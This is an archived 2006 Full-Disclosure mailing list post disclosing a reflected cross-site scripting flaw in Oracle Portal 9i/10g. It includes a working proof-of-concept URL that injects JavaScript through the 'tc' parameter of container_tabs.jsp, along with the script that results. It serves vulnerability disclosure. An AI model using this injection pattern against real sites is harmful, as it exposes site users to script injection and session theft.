[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Oracle Applications/Portal 9i/10g Cross Site Scripting

To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Oracle Applications/Portal 9i/10g Cross Site Scripting
From: "putosoft softputo" <hasecorp@xxxxxxxxxxx>
Date: Fri, 22 Dec 2006 08:30:42 +0000

Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the 
Oracle Portal. The following is one that you may found in any version:

http://<target>/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//

The following code will be generated:

---SNIPPED---
<script language=javascript>
top.null = 
null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',
 
'null');//.render(window);
</script>
---SNIPPED---

Solution
------------

There is no solution. As a workaround, enable mod_security if it's not. 
Otherwise wait 6 months/1 year for a patch from Oracle Corp.

_________________________________________________________________
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con 
MSN Entretenimiento. http://entretenimiento.msn.es/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
Next by Date: Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day
Previous by thread: [Full-disclosure] rPSA-2006-0234-1 firefox
Next by thread: [Full-disclosure] Test Posting
Index(es):
- Date
- Thread